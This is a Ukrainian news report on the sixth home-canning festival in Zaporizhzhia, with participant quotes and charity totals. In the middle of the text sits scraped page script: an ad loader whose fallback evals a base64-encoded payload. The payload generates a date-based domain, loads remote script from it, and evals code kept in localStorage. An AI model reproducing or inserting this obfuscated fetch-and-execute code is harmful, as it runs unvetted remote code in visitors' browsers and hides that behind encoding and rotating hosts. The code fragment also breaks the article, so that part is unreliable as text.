Цими вихідними, 19-20 вересня, жителів Запоріжжя та гостей міста вже шостий раз поспіль дивував фестиваль домашньої консервації.
Варення із горіхів, соснових шишок і зі шкірок кавуна та апельсина, шоколадно-баклажанний джем, гострі соуси з полуниці та помідорів: усі охочі могли скуштувати та придбати такі незвичні поєднання в яскравих баночках.
Карантин вніс свої корективи, тому організатори не запрошували учасників із «жовтої», «помаранчевої» та «червоної» зон. На фестивалі демонстрували свої таланти здебільшого мешканці Запоріжжя та Дніпра.
Ми робимо чатні, джеми, пастилу, ароматизовану оливкову олію на травах. На участь мене надихнула дача. Дуже багато ягід і фруктів, які нікуди дівати. Саме тому й вирішила робити чатні – соуси до м’яса, овочів, сирів. Також часто беруть пастилу для діток. Попит на некласичні варення та джеми невеличкий, але є. Я готую смачні джеми з полуниці та вина, груші та шампанського, дині та лаванди, — розповіла учасниця фестивалю Тетяна Мороз (авторська студія «Buket-furshet»).
У нас сімейна торговельна марка «Zapalnichka», яка займається виготовленням гострих соусів. Людей у цьому році менше через карантин, але атмосфера чудова. Також вражають виступи творчих колективів. Фестиваль колоритний і цікавий, — поділилася враженнями учасниця фестивалю Тетяна Пузанова. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
На фестивалі можна було придбати й крафтові смаколики: мед, пастилу, чаї, еко-чіпси, авторські сири та ковбаси.
Одночасно із торгівлею була й культурна програма: майстер-класи, виступи танцювальних і вокальних колективів, розіграші та різні інтерактиви.
Ми організували цікаву розвагу для запоріжців – стрільбу з лука. Це захопливий вид відпочинку, адже ви тренуєте як м’язи, так і силу волі. На фестивалі доволі багато охочих постріляти з найдавнішого виду зброї, — розповів учасник фестивалю, козак Запорізького Війська Низового «Запорізька Січ».
Протягом заходу
організатори збирали консервацію, яку планують передати нашим бійцям і всім,
хто цього потребує. Вони розповіли, що загальний обсяг зібраної консервації
протягом усіх шести фестивалів перевищив 5,5 тон. Понад 800 кг закаток зібрали на першому фестивалі в 2015 році.
На другому фестивалі встановили Рекорд України, зібравши 1762 кг домашньої
консервації для благодійних потреб. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/u-zaporizhzhi-vidbuvsya-traditsijnij-vseukrayinskij-festival-domashnoyi-konservatsiyi-fotoreportazh/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook